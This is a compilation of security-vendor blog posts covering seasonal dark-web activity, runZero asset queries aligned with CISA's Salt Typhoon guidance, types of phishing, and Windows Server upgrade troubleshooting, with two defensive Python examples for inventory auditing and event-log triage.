Our research shows that illicit posts peak in November, December, and January. The darkest months of the year also see the most activity in the web’s shadowy corners.

Why is winter the peak season for illicit posts?

We studied posts from June 2023 to October 2024. We categorized posts by topics and focused on illicit ones. Here’s how those posts were distributed:

These numbers reflect posts on the dark web, not actual attacks. However, research by BitNinja Security, Cloud Security Alliance, and Mimecast shows that Q4 is also when most cyber-attacks take place. This suggests a link between increased dark web activity and real-world cybercrime during this period.

Why are threat actors more active in dark months, both discussing illicit topics and committing crimes?

Carlos Salas (Sr. R&D Engineer at NordLayer): “In most industries, November to January is the busiest time, mainly because of the high amount of transactions from Thanksgiving, Black Friday, and Christmas. Criminals exploit this, knowing people are more likely to click on a phishing link while going through thousands of email orders and offers, compromising their network security.”

It’s a known issue. Black Friday is already called Black Fraud Day. In the UK only, more than 16,000 reports of online shopping fraud were recorded between November 2023 and January 2024, with each victim losing £695 on average.

Andrius Buinovskis (Head of Product at NordLayer): “Everyone is looking for gifts and the best prices, and fake ads try to hook you into deals. Bad actors exploit this season, using urgency tactics boosted by AI to spread threats. People are more relaxed and less cautious, paying less attention to how they use personal and company devices. Employees might receive phishing emails like a supposed ‘yearly bonus’ from the CEO, which could lead to catastrophic consequences for the company.”

But cybercrime is not the only thing discussed on dark web forums. A large share of posts is about sharing pirated software and media, such as movies.

That share grows in the dark months as well. Comparing the summer months of 2023 with November to January, the number of dark forum posts about pirated content of all kinds surged by 105%.

Vakaris Noreika (Head of Product at NordStellar): “I think it’s the weather, to be honest. People tend to stay at home more and sit at their computers bored, which makes them more active in their cybercriminal activities. We’ve seen a similar effect during the COVID lockdown when the number of dark web users increased a lot. We also see fewer large data breaches in the summer, and this cycle seems to repeat every year.”

Like advanced persistent threats, “advanced persistent teenagers” are now a problem. Bored but skilled threat actors cause major disruptions. They trick employees with emails and calls, posing as help desk staff. These attacks lead to data breaches affecting millions. Teenagers now show techniques once limited to nation-states.

Another factor is adding to the boredom of dark web forum users. They are mostly from countries where winter is pretty harsh. Most users accessing Tor—the browser used for dark web activities—are from Germany (36%), the US (14%), and Finland (4%). For countries where users access Tor via bridges, the top is Russia (41%). Maybe dark web forums are just the coziest winter hangouts.

Changing platforms and AI effects on cybercrime

Our research shows that September and October of 2024 had far fewer posts about illicit topics on dark web forums than a year before. Why is that?

Vakaris Noreika: “There could be many reasons why this happens. The most notable ones are maybe the platform changes; some hacker forums close, others open up, some become popular to fade out later.

There are some hacker communities, especially from Russia, which have been active for more than 20 years now. This is because the forum owners don’t get arrested, unlike forum owners from the US, UK, etc., who do get arrested way more often.

Telegram has also been a huge platform change. We’ve seen exponential growth in hacking-related activity on Telegram since the beginning of the war in Ukraine. But Telegram activity is focused on niche topics, while forums cover a wider range of ideas.”

Another trend affecting dark web discussions could be AI use in cybercrime.

Retail and cloud computing giant Amazon, which can now view activity on around 25% of all IP addresses on the internet, says it is seeing hundreds of millions more possible cyber threats across the web each day compared to earlier this year. They used to see about 100 million hits per day, but that number has grown to 750 million over six or seven months.

Amazon’s Chief Information Security Officer attributes this to AI making tasks easier for ordinary people, letting them do things they could not do before just by asking the computer. That may also explain the drop in forum discussion: why ask others when AI can do the work for you?

How to protect organizations during peak cybercrime seasons

So, winter months bring not only holidays but also heightened cyber risks. Instead of enjoying time with your family, you might find yourself dealing with cyber-attacks.

But don’t worry—there are steps you can take to protect your organization. The good news is these measures aren’t expensive or hard to implement.

Many of these precautions are the same as those needed year-round. Basic cybersecurity practices like employee training, strong passwords, and regular software updates are essential.

Employee education is the first line of defense.

Vakaris Noreika: “It’s hard to control what happens with your employees. It’s unavoidable that their data will be leaked online, and this data might be used to attack your company. Here’s what I always encourage companies to do:

  1. Educate employees about phishing, credential stuffing, and other popular attack methods.
  2. Take care of the information that’s already leaked: monitor it and react. NordStellar can help with that.
  3. Manage access to important company resources carefully.

By doing this, you will be better off than 99% of companies around.”

Prepare now to minimize risks during the peak cyber-attack season.

Carlos Salas: “Double down on cybersecurity awareness in the months before the high season. Consider having a pentest done beforehand to know what could be exploited by criminals.

That said, we’re humans, and there will always be a chance of clicking the wrong link or sharing the wrong files. So, practices such as network segmentation, setting up security policies for devices, or using toolsets such as Data Loss Prevention suites and malware protection are a must-have. They help contain the threats and minimize the ‘blast radius’ of any security incident.”

With AI making cyber-attacks easier, it’s crucial to think about these things right now, when the cyber-attack season is at its peak. The next year could bring even more advanced threats.

So, give your company a Christmas present and invest in a solid cybersecurity solution.

Methodology

NordStellar acquired data from over 80 forums where illicit activities are most often discussed. These forums span different web layers: the clear web, the deep web, and the dark web. We gathered textual content from forum threads between June 2023 and October 2024. The numbers we obtained represent the number of forum posts.

We used a fine-tuned AI model to categorize dark web posts into 67 tags. These tags were then grouped into 10 broader categories. For example, the tag “SERVICE” refers to posts where users offer services for a fee, including hacking or hiring hitmen. This tag falls under “Illicit services and marketplaces.”

The study is thorough but has limitations from analyzing posts on approximately 80 forums only. Additionally, the shorter lifecycle of criminal sites and the rapid rise of mirror sites can affect data consistency and completeness.

About Nord Security
The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.

About NordLayer
NordLayer is an adaptive network access security solution for modern businesses – from the world’s most trusted cybersecurity brand, Nord Security.

About Version 2 Limited
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

Taming the Typhoons: How runZero Keeps You Ahead of State-Sponsored Cyber Threats

China’s state-sponsored cyber operations—aptly nicknamed with “Typhoon” monikers—have been brewing trouble for over a decade. From Violet to Salt Typhoon, these advanced persistent threat (APT) groups have been wreaking havoc on government entities, critical infrastructure, and other high-value targets. Their evolution highlights one thing loud and clear: attackers are always one step ahead, looking for the weakest link. 

But fear not—there’s a way to outpace these storms. Let’s break down what these Typhoons have been up to and how runZero brings calm to the chaos with unparalleled visibility and proactive defense.

The Typhoon Timeline: An Evolution of Threats

The Typhoon story began with Violet Typhoon, which stuck to the basics: phishing, exploiting known vulnerabilities, and going after traditional IT systems. They were your typical “steal the sensitive data and run” kind of crew.

Then came Volt Typhoon, which shifted focus to U.S. critical infrastructure. They embraced “living off the land” techniques, cleverly blending into hybrid IT and OT environments while avoiding detection. Think of them as the first innovators of the Typhoons.

Not to be outdone, Flax Typhoon targeted IoT devices like cameras and DVRs, transforming these “unimportant” devices into powerful botnets. It was a wake-up call for organizations ignoring their IoT inventory.

And now, Salt Typhoon has arrived, skillfully exploiting IT, OT, and IoT systems with alarming precision. Their primary focus? Telecommunications providers and ISPs, where they leverage trusted devices and connections to steal customer call records, compromise private communications—particularly those of individuals involved in government or political activities—and access sensitive information tied to U.S. law enforcement requests under court orders.

Why Visibility is the Game-Changer

The Typhoon saga reveals one critical truth: attackers will find the blind spots in your network. Whether it’s a forgotten IoT device, an outdated VPN concentrator, or a misconfigured firewall, these gaps become open doors for adversaries.

That’s why visibility—complete visibility—is key to staying ahead. Enter runZero.

How runZero Helps You Outmaneuver Salt Typhoon

Salt Typhoon thrives on exploiting edge devices and blending into your network. But runZero makes their job infinitely harder. Here’s how we give you the upper hand:

  • Proactive Edge Discovery: With real-time scanning and unmatched fingerprinting capabilities, runZero identifies every device—routers, firewalls, switches—before attackers can. Firmware versions? Check. Misconfigurations? Double-check.
  • Mapping Internal Pathways: Once inside, attackers aim to move laterally. runZero lights up internal pathways, exposing high-risk devices and connections that could serve as stepping stones for adversaries.
  • Correlating Internal and External Risks: Unlike siloed tools, runZero connects the dots between internal and external assets, revealing shared vulnerabilities and dependencies. That’s insight no other platform offers.
  • Risk-Based Prioritization: runZero doesn’t just throw vulnerabilities at you. It ranks them by exploitability, exposure pathways, and criticality, so you can tackle the most pressing issues first.
  • Continuous Monitoring: Networks change constantly, and so do risks. With runZero’s continuous discovery, you’ll always have an up-to-date picture of your attack surface.

Actionable Insights for Real-World Defense

Need proof of what runZero can do? Let’s take CISA’s latest guidance tailored to counter Salt Typhoon’s tactics and the queries you can use in the runZero platform to identify assets at risk.

Strengthening Visibility: Monitoring: Network Engineers

If feasible, limit exposure of management traffic to the Internet. Only allow management via a limited and enforced network path, ideally only directly from dedicated administrative workstations. Do not manage devices from the internet. Only allow device management from trusted devices on trusted networks.

# Service Query
(type:router OR type:switch OR type:firewall) AND (port:80 OR port:443) AND has_public:true

Monitor user and service account logins for anomalies that could indicate potential malicious activity. Validate all accounts and disable inactive accounts to reduce the attack surface. Monitor logins occurring internally and externally from the management environment.

# Users Query
alive:t AND (
  isDisabled:true
OR
  (source:googleworkspace suspended:t)
OR
  (source:googleworkspace isEnforcedIn2Sv:f)
OR
  (has:accountExpiresTS)
OR
  (isDisabled:true)
OR
  (passwordExpired:true OR msDS-UserPasswordExpiryTimeComputedTS:<now))

Ensure the inventory of devices and firmware in the environment are up to date to enable effective visibility and monitoring. runZero can track and incorporate end-of-life data from a variety of sources.

# Asset Query
os_eol_expired:t

Monitoring: Network Engineers

Closely monitor all devices that accept external connections from outside the corporate network.

# Asset Query
has_public:t

IPsec tunnel usage

# Service Query
protocol:ike

Hardening Systems & Devices: Protocols and Management Processes: Network Engineers

Additionally, as a general strategy, put devices with similar purposes in the same VLAN. For example, place all user workstations from a certain team in one VLAN, while putting another team with different functions in a separate VLAN. runZero’s innovative outlier score can help locate devices that don’t look like others in the same site.

# Asset Query
outlier:>=2

If using Simple Network Management Protocol (SNMP), ensure only SNMP v3 with encryption and authentication is used.

# Service Query
protocol:snmp1 OR protocol:snmp2 OR protocol:snmp2c

Disable all unnecessary discovery protocols, such as Cisco Discovery Protocol (CDP).

# Service Query
protocol:cdp

Ensure Transport Layer Security (TLS) v1.3 is used on any TLS-capable protocols to secure data in transit over a network.

# Service Query
tls.supportedVersionNames:"SSL" OR tls.supportedVersionNames:"TLSv1.0" OR tls.supportedVersionNames:"TLSv1.1" OR tls.supportedVersionNames:"TLSv1.2"

Disable Secure Shell (SSH) version 1.

# Service Query
banner:"SSH-1"

Hardening Systems & Devices: Protocols and Management Processes: Network Defenders

Disable any unnecessary, unused, exploitable, or plaintext services and protocols, such as Telnet, File Transfer Protocol (FTP), Trivial FTP (TFTP), SSH v1, Hypertext Transfer Protocol (HTTP) servers, and SNMP v1/v2c.

# Service Query
protocol:telnet OR protocol:ftp OR protocol:tftp OR banner:"SSH-1" OR (protocol:http AND NOT protocol:tls) OR protocol:snmp1 OR protocol:snmp2 OR protocol:snmp2c

Conduct port-scanning and scanning of known internet-facing infrastructure.

# Service Query
has_public:t
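The checks above, expressed as an offline audit over an exported inventory, as an added example (not runZero's code or query engine): the record layout, field names and sample assets are constructed here. It also shows why `SSH-1.99` banners matter: that string advertises SSH protocol version 1 compatibility and is matched by the `banner:"SSH-1"` substring query.

```python
"""Audit an exported asset/service inventory against the checks above.

Added example, not runZero's code or query engine. The record layout,
field names and sample assets are constructed for this example.
"""
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Service:
    port: int
    protocols: frozenset                    # e.g. {"http", "tls"}, {"snmp2c"}, {"ike"}
    banner: str = ""
    tls_versions: frozenset = frozenset()   # e.g. {"TLSv1.2", "TLSv1.3"}
    public: bool = False                    # answers from the internet (has_public)


@dataclass
class Asset:
    name: str
    kind: str                       # router, switch, firewall, server, desktop, ...
    os_eol_expired: bool = False
    outlier: int = 0                # how unlike its neighbours the asset looks
    services: list = field(default_factory=list)


NETWORK_GEAR = {"router", "switch", "firewall"}
LEGACY_SNMP = {"snmp1", "snmp2", "snmp2c"}            # only SNMPv3 is acceptable
PLAINTEXT = {"telnet", "ftp", "tftp"}
WEAK_TLS = {"SSL", "TLSv1.0", "TLSv1.1", "TLSv1.2"}   # anything below TLS 1.3


def audit_asset(asset):
    """Return (check, detail) findings for one asset, one per matching rule."""
    findings = []
    if asset.os_eol_expired:
        findings.append(("eol-os", asset.name))
    if asset.outlier >= 2:
        findings.append(("outlier", f"{asset.name} (score {asset.outlier})"))
    for svc in asset.services:
        tag = f"{asset.name}:{svc.port}"
        p = svc.protocols
        if svc.public:
            findings.append(("public-service", tag))
            # management web UI on network gear answering from the internet
            if asset.kind in NETWORK_GEAR and svc.port in (80, 443):
                findings.append(("public-mgmt", tag))
        if p & LEGACY_SNMP:
            findings.append(("legacy-snmp", tag))
        if "cdp" in p:
            findings.append(("cdp", tag))
        if p & PLAINTEXT or ("http" in p and "tls" not in p):
            findings.append(("plaintext", tag))
        # substring match, like banner:"SSH-1": also catches "SSH-1.99",
        # which advertises that the server still accepts protocol version 1
        if "SSH-1" in svc.banner:
            findings.append(("ssh1", tag))
        weak = svc.tls_versions & WEAK_TLS
        if weak:
            findings.append(("weak-tls", f"{tag} {','.join(sorted(weak))}"))
        if "ike" in p:
            findings.append(("ipsec-tunnel", tag))   # informational: IPsec endpoint
    return findings


def audit_inventory(assets):
    """Group findings by check so each guidance item can be reviewed in turn."""
    report = defaultdict(list)
    for asset in assets:
        for check, detail in audit_asset(asset):
            report[check].append(detail)
    return dict(report)


def sample_inventory():
    """Constructed sample inventory (not a real network)."""
    return [
        Asset("fw-edge-1", "firewall", services=[
            Service(443, frozenset({"http", "tls"}), public=True,
                    tls_versions=frozenset({"TLSv1.2", "TLSv1.3"})),
            Service(161, frozenset({"snmp2c"})),
            Service(0, frozenset({"cdp"})),            # layer-2, no TCP/UDP port
        ]),
        Asset("sw-core-1", "switch", services=[
            Service(22, frozenset({"ssh"}), banner="SSH-1.99-Cisco-1.25"),
            Service(23, frozenset({"telnet"})),
        ]),
        Asset("vpn-gw-1", "router", os_eol_expired=True, services=[
            Service(500, frozenset({"ike"}), public=True),
        ]),
        Asset("web-1", "server", services=[
            Service(80, frozenset({"http"})),
            Service(443, frozenset({"http", "tls"}),
                    tls_versions=frozenset({"TLSv1.3"})),
        ]),
        Asset("ws-odd-1", "desktop", outlier=3),
    ]


if __name__ == "__main__":
    for check, details in sorted(audit_inventory(sample_inventory()).items()):
        print(f"{check:15} {', '.join(details)}")
```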

The Final Word

The Typhoon threat is real, but with runZero, you don’t have to weather the storm alone. Whether you’re facing state-sponsored attackers like Salt Typhoon or just trying to get a handle on your sprawling network, runZero does more than uncover what’s hiding in your network—we redefine what’s possible in exposure management. Our agentless, credential-free approach means you get instant insights without the hassle. And our advanced fingerprinting technology? It’s second to none, giving you detailed device profiles that competitors can only dream of.

But it’s not just about tech; it’s about speed and adaptability. As networks grow more complex and threats more advanced, runZero ensures you’re always one step ahead of these Typhoons no matter how their tactics evolve. From shadow IT to unmanaged IoT, we uncover everything—because the very things you didn’t know existed are exactly what these attackers are looking for.

About runZero
runZero, a network discovery and asset inventory solution, was founded in 2018 by HD Moore, the creator of Metasploit. HD envisioned a modern active discovery solution that could find and identify everything on a network–without credentials. As a security researcher and penetration tester, he often employed benign ways to get information leaks and piece them together to build device profiles. Eventually, this work led him to leverage applied research and the discovery techniques developed for security and penetration testing to create runZero.

Gone Phishing: Understanding Different Phishing Types and How to Protect Yourself

Phishing attacks have become an epidemic. Approximately 3.4 billion phishing emails are sent worldwide each day, making it the leading attack vector in 41% of all data breaches. And it’s not just e-mail—phishing has expanded to voice, text, social media, and even fake websites, targeting users across multiple platforms to steal sensitive information and compromise accounts.

The aim of a phishing scam is to steal your credentials, and it’s no wonder why—according to Verizon, 86% of data breaches in 2023 involved compromised credentials.  And AI is making the various phishing schemes easier than ever – from improving the quality of the e-mails themselves and removing the tell-tale grammatical errors to using fake voices in vishing scams, the effectiveness of these scams is only increasing.  

Below, we explore the different types of phishing and how they work, and then discuss how you can protect yourself from this ever-growing threat.

Classic Phishing Attacks

Classic phishing attacks typically involve deceitful emails designed to trick recipients into revealing personal information or clicking malicious links. These emails often mimic legitimate companies or organizations to gain the victim’s trust. Google intercepts around 100 million phishing emails daily, but that leaves quite a few still making it through. Telltale signs of a phishing e-mail are links that do not look right (perhaps a misspelled domain name like amazone.com or extra words like amazon.customersupport.com), some odd grammar choices, and a sense of urgency that seems out of place (“update info now or your account will be disabled!”).

SMShing (or Smishing)

“You won a $1,000 gift card!” “USPS cannot deliver your package, click here to update your address!” “Unusual activity detected on your bank account!” Chances are, you’ve gotten a text message like that, which is an attempt at SMShing, or phishing via SMS. Like e-mails, they often contain an unusual sense of urgency and some misplaced links, but the link shorteners commonly used in legitimate text messages make these harder to spot. Always go directly to the company’s website to confirm any message that asks you to do something, and remember that a US government entity like the USPS or IRS is not going to communicate with you solely via text.

If you’re in the US, did you know you can forward SMShing messages to the FTC?  Send to 7726 (AKA SPAM on your phone’s keypad) and it will help your wireless provider identify and block these messages in the future.  

Vishing

Vishing (short for “voice phishing”) is a type of phishing attack that uses voice communication, typically phone calls, to deceive victims into revealing sensitive information, such as login credentials, financial details, or personal data.   A very common one in the US purports to be from the IRS, threatening penalties and jail time due to back taxes.  This one has been around for a while – a viral video from 2018 shows a police officer in Midland, Texas talking to a scammer who tells him to clear his back taxes by buying Apple gift cards or the police would be en route to arrest him within 45 minutes.    

Spear Phishing

Spear phishing is a refined and highly targeted form of phishing that requires more effort and research from the attacker. Unlike general phishing, which casts a wide net hoping to snare any unsuspecting victim, spear phishing focuses on specific individuals or organizations. Attackers gather detailed information about their targets to create highly convincing messages that appear legitimate and relevant.

These attackers often utilize information from social media profiles, company websites, and other publicly available sources to customize their approach. The crafted messages may reference recent activities, personal interests, or professional responsibilities, making them difficult to distinguish from genuine communications. This personalization increases the chances of the victim being deceived.

For instance, an attacker targeting an executive might send an email that appears to be from a trusted colleague or business partner. The message might discuss a recent meeting or project, encouraging the recipient to click on a link or download an attachment. Once the victim takes the bait, they could unknowingly download malware or reveal sensitive information, potentially compromising the entire organization.

Spear phishing is not limited to email. Attackers may also use phone calls, social media messages, or even physical mail to carry out their schemes. Given the targeted nature of these attacks, they can have severe consequences, including data breaches, financial loss, and reputational damage.

Recognizing and defending against spear phishing requires a keen eye and a proactive approach. Employees should be trained to scrutinize unexpected communications, even if they seem to come from known contacts. Encourage staff to verify the legitimacy of suspicious messages by contacting the sender through a different, trusted method.

In addition to awareness training, employing technical defenses can help mitigate the risk of spear phishing. Advanced email filters, multi-factor authentication, and robust cybersecurity protocols add layers of protection. By combining vigilance with technological safeguards, individuals and organizations can better protect themselves against the sophisticated tactics of spear phishers.

Whaling

A whaling attack is a highly targeted phishing attack aimed at high-level executives, such as CEOs, CFOs, or other senior leaders within an organization. The goal is to deceive these individuals into sharing sensitive information, transferring funds, or granting access to confidential systems.  Unlike the first two methods, these attacks are often carefully crafted to appear legit, banking on busy executives who may get careless with doing their due diligence.  In addition to the usual compromised credentials, they might also target intellectual property or strategic competitive intelligence (but they’re not above wire fraud, either!)

Clone Phishing

Clone phishing is a type of phishing attack in which a legitimate email or message that the victim has previously received is copied (“cloned”) and slightly altered by an attacker. The goal is to trick the recipient into believing the new, fraudulent message is a genuine follow-up or update.  

This might not seem different than regular phishing, but the key is that it’s coming from a trusted source.  For instance, during the Okta breach, the targets were customers who had actually used Okta support recently.  Since they might be expecting a message from Okta, the recipients might have understandably not been as vigilant as normal in spotting any irregularities.  

Angler Phishing

Angler phishing is a type of social media phishing attack in which cybercriminals impersonate customer service accounts to deceive users into revealing sensitive information or downloading malware. The term “angler” comes from the way attackers “fish” for victims on social platforms. When you consider that messaging company accounts on Facebook and/or Twitter has become an established way to get better support than going through traditional channels like phone or e-mail, this type of attack targets users who are already frustrated (and thus perhaps more likely to be careless).

Reducing Phishing Risks with Passwordless Login

Transitioning to passwordless certificate-based authentication is a promising strategy to counter phishing attacks. This method uses certificates for authentication, eliminating the need for passwords altogether. This means attackers cannot steal passwords through phishing, significantly reducing the risks of compromise.

In addition to a higher level of security, passwordless authentication simplifies the login process for users. Instead of remembering complex passwords, authentication is handled through the secure exchange of cryptographic keys, where a digital certificate issued by a trusted authority verifies the user’s identity. This enhances security and improves the user experience, making it more convenient and efficient.

Organizations adopting passwordless authentication can benefit from reduced helpdesk calls related to password resets and improved compliance with security policies. This transition also aligns with modern security standards and best practices, positioning organizations ahead of evolving cyber threats.

Embracing passwordless authentication can fortify your defenses against phishing and other cyberattacks, paving the way for a more secure and user-friendly digital environment.

About Portnox
Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.

Best Practices for Troubleshooting a Windows Server Upgrade

To upgrade, or not to upgrade. While that may not have been the question that Hamlet asked, it’s one you might be asking. You already made the mistake of asking Reddit, “should I do an in-place upgrade,” and, as expected, people had Big Opinions. A Windows Server Feature Update offers benefits, like performance and analytics. On the other hand, if you have problems, then your attempts can lead to business downtime and service disruption. Meanwhile, time rolls on toward the October 2025 end-of-service (EoS) for Windows Server 2016.

If you’re still trying to decide if or when to do a Feature Update, then these best practices for troubleshooting a Windows Server upgrade might help you.

What is an in-place Windows Server upgrade?

An in-place Windows server upgrade, also called a Feature Update, is when an organization updates an older operating system version to a new one without making changes to:

  • Settings
  • Server roles
  • Data

By not requiring the IT department to reinstall Windows, the in-place upgrade reduces downtime and business disruption while improving security and system performance.

The process for an in-place Windows server upgrade is:

  • Collecting diagnostic information for troubleshooting issues
  • Backing up the server operating system, applications, and virtual machines
  • Performing the Feature Update using the Windows Server Setup
  • Checking the in-place upgrade to see if it worked

Which version of Windows Server should I upgrade to?

Depending on your current operating system, you may have different supported paths:

  • Windows Server 2012: Windows Server 2012 R2, Windows Server 2016
  • Windows Server 2012 R2: Windows Server 2016, Windows Server 2019, Windows Server 2025
  • Windows Server 2016: Windows Server 2019, Windows Server 2022, Windows Server 2025
  • Windows Server 2019: Windows Server 2022, Windows Server 2025
  • Windows Server 2022: Windows Server 2025
  • Windows Server 2025: Windows Server 2025

Microsoft no longer supports Windows Server 2008 or Windows Server 2008 R2.

Reasons for Upgrading Windows Servers

Upgrading Windows Server provides many of the same benefits that updating other device operating systems (OS) provides.

1. Enhanced Security

As with any operating system, the Windows Server upgrades typically incorporate new security features. For example, Windows Server 2022 brought with it:

  • Secured-core server: hardware, firmware, and driver capabilities to mitigate security risks during boot, at the firmware level, and from OS executing unverified code
  • Secure connectivity: implementing HTTPS and TLS 1.3 by default, and encryption across DNS and Server Message Block (SMB).

Meanwhile, Windows Server 2025 includes security upgrades for:

  • Name and SID lookup forwarding between machine accounts
  • Confidential attributes
  • Default machine account passwords
  • LDAP encryption by default

2. Improved Performance

The OS updates improve performance by changing how processes work. For example, Windows Server 2022 improved performance with changes like:

  • Encrypting SMB data before data placement
  • Reducing Windows Container image sizes
  • Improving both UDP and TCP networking performance
  • Enhancing Hyper-V virtual switches with Receive Segment Coalescing (RSC)
  • Allowing users to adjust storage repair speed
  • Making storage bus cache available for standalone servers

Meanwhile, Windows Server 2025 improves performance with changes like:

  • Block cloning support
  • Dev Drive storage volume focused on file system optimizations that improve control over storage volume settings
  • Enhanced Log to reduce impact on Storage Replica log implementation

3. Enhanced Efficiency and Agility

As the world migrates to hybrid on-premises and cloud infrastructures, the upgrades to Windows Server follow along. For example, Windows Server 2022 came with new Azure hybrid capabilities with Azure Arc, a way to manage Windows and Linux physical servers and virtual machines hosted outside of Azure to maintain consistency. With Windows Server 2025, the Azure Arc setup Feature-on-Demand is installed by default so adding servers is easier.

Challenges with Windows Server Upgrades

While upgrading Windows Server comes with multiple benefits, you may be concerned about the potential problems and challenges, including:

  • Compatibility issues: Applications running on the server may not work with the new OS version, leading to outages.
  • Configuration restrictions: Server boot configurations may complicate the upgrade process, requiring reconfiguration or virtualization changes.
  • Disk space: Upgrades typically require extra space for installation files and temporary processing or else they fail.

How to Troubleshoot a Windows Server Upgrade

While you want everything to work perfectly, you don’t live in a perfect world. If you have to troubleshoot your Windows Server upgrade, then you might want to consider some of these issues.

Review event logs

Using the Event Viewer, you can scan the System and Application logs for Windows Events generated around the same time you did the upgrade. Some Windows Server error codes include:

  • 0x80244007: Windows cannot renew the cookies for the Windows Update
  • 0x80072EE2: Windows Update Agent unable to connect to the update servers or your update source, like Windows Server Update Services (WSUS)
  • 0x8024401B: Proxy error leads to Windows Update Agent being unable to connect to update servers or your update source, like WSUS.
  • 0x800f0922: Updates for Windows Server 2016 failed to install.
  • 0x800706be: Windows Server 2016 cumulative update failed to install and was
  • 0x80090322: HTTP service principal name (SPN) registered to another service account so PowerShell unable to connect to a remote server using Windows Remote Management (WinRM)

Check for Pending Reboot

An upgrade typically requires four reboots. After the first reboot, you can expect another within 30 minutes. If you see no progress, the upgrade may have failed.

Review Servicing Stack Updates

The servicing stack updates (SSUs) fix problems with the component that installs the Windows Server updates to make sure they’re reliable. Without the latest SSU installed, you may not be able to install the feature or security updates.

Check CPU and I/O

Since the Windows Server upgrade uses a lot of compute power and disk space, you want to make sure that you check these metrics to make sure the process is progressing.

Check Firewall Service

You may need to have the Windows firewall service running for the updates to work. To check whether the service is running, go to Service Manager>Services>Windows Firewall.
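The log-review and reboot checks above as a triage script, added here as an example (not Graylog's or Microsoft's code): it assumes a constructed `timestamp|log|id|message` export of the System and Application logs, counts boots by System event ID 6005, flags gaps longer than the 30-minute window, and resolves the error codes listed above regardless of letter case.

```python
"""Triage an exported Windows event log around an in-place upgrade.

Added example, not Graylog's or Microsoft's code. The export format
below (timestamp|log|id|message) is a constructed layout, not the
native EVTX or CSV format.
"""
import re
from datetime import datetime, timedelta

# Error codes named in the article, keyed in upper case so that mixed-case
# codes in messages (0x800f0922 vs 0x800F0922) resolve to one entry.
KNOWN_CODES = {
    "0x80244007": "Windows cannot renew the Windows Update cookies",
    "0x80072EE2": "Windows Update Agent cannot reach the update source (e.g. WSUS)",
    "0x8024401B": "proxy error; Windows Update Agent cannot reach the update source",
    "0x800F0922": "Windows Server 2016 updates failed to install",
    "0x800706BE": "Windows Server 2016 cumulative update failed to install",
    "0x80090322": "HTTP SPN registered to another account; WinRM connection fails",
}
HEX_CODE = re.compile(r"0x[0-9A-Fa-f]{8}")
BOOT_EVENT_ID = 6005                    # System log: Event Log service started, i.e. a boot
REBOOT_WINDOW = timedelta(minutes=30)   # the next reboot is expected within 30 minutes
EXPECTED_REBOOTS = 4                    # an upgrade typically reboots four times

# Constructed sample export (not from a real server); times are ISO 8601.
SAMPLE_EXPORT = """\
2025-01-10T21:00:00|System|1074|setup.exe has initiated the restart of SRV01: Operating System: Upgrade (Planned)
2025-01-10T21:03:10|System|6005|The Event log service was started.
2025-01-10T21:20:45|System|6005|The Event log service was started.
2025-01-10T21:55:00|Application|1001|Windows Error Reporting: setup failed with 0x800f0922
2025-01-10T22:10:00|System|6005|The Event log service was started.
2025-01-10T22:12:30|Application|20|Windows Update Agent: error 0x80072ee2 contacting WSUS
2025-01-10T22:13:00|Application|20|Installer returned 0xDEADBEEF
"""
UPGRADE_START = datetime(2025, 1, 10, 21, 0, 0)


def parse_export(text):
    """Turn 'timestamp|log|id|message' lines into dicts with datetime objects."""
    records = []
    for line in text.strip().splitlines():
        ts, log, event_id, message = line.split("|", 3)
        records.append({"time": datetime.fromisoformat(ts), "log": log,
                        "id": int(event_id), "message": message})
    return records


def triage(records, upgrade_start, expected_reboots=EXPECTED_REBOOTS):
    """Summarise reboots, stalls and error codes seen after upgrade_start."""
    after = [r for r in records if r["time"] >= upgrade_start]
    boots = [r["time"] for r in after
             if r["log"] == "System" and r["id"] == BOOT_EVENT_ID]
    # A gap between consecutive boots longer than the window suggests a stall.
    stalls = [(a, b) for a, b in zip(boots, boots[1:]) if b - a > REBOOT_WINDOW]
    errors = []
    for r in after:
        for raw in HEX_CODE.findall(r["message"]):
            code = "0x" + raw[2:].upper()
            errors.append((r["time"], code, KNOWN_CODES.get(code, "unrecognized code")))
    return {
        "reboots": len(boots),
        "reboots_missing": max(0, expected_reboots - len(boots)),
        "stalls": stalls,
        "errors": errors,
    }


def triage_sample():
    """Run the triage over the constructed export above."""
    return triage(parse_export(SAMPLE_EXPORT), UPGRADE_START)


if __name__ == "__main__":
    result = triage_sample()
    print(f"reboots seen: {result['reboots']} (missing {result['reboots_missing']})")
    for a, b in result["stalls"]:
        print(f"stall: no reboot between {a:%H:%M} and {b:%H:%M}")
    for when, code, meaning in result["errors"]:
        print(f"{when:%H:%M} {code}: {meaning}")
```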

Graylog Enterprise: Faster Troubleshooting

Graylog Enterprise enables you to aggregate, correlate, and analyze all your log data in a single location. With Graylog Extended Log Format (GELF) inputs and BEATS inputs, you have a standardized format across Windows log types.

Graylog supports Winlogbeat to ingest Windows event logs directly into our BEATS input, or you can use the NXLog community edition that reads Windows event logs and forwards them in GELF.

Using Graylog Sidecar, you can implement multiple configurations per collector and centrally manage their configurations through the Graylog interface. Graylog Cloud accepts inputs from the Graylog Forwarder so that you can collect the same kind of logs from different parts of your infrastructure or maintain a more redundant setup.

About Graylog
